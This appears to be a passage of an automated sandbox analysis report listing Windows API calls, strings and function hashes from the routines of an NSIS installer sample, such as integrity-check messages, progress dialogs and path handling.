                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 2803837635-787788815
                                                                                                      • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                      • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                      • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                      • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                      • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                      Strings
                                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 717251189-730719616
                                                                                                      • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                      • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                      • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                      • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 163830602-2366072709
                                                                                                      • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                      • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                      • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                      • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531174081-0
                                                                                                      • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                      • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                      • String ID: ... %d%%
                                                                                                      • API String ID: 722711167-2449383134
                                                                                                      • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                      • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                      APIs
                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2667972263-0
                                                                                                      • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                      • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                      • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                      • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                      • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                      • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":
                                                                                                      • API String ID: 589700163-165019052
                                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1941528284-0
                                                                                                      • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                      • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                      • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
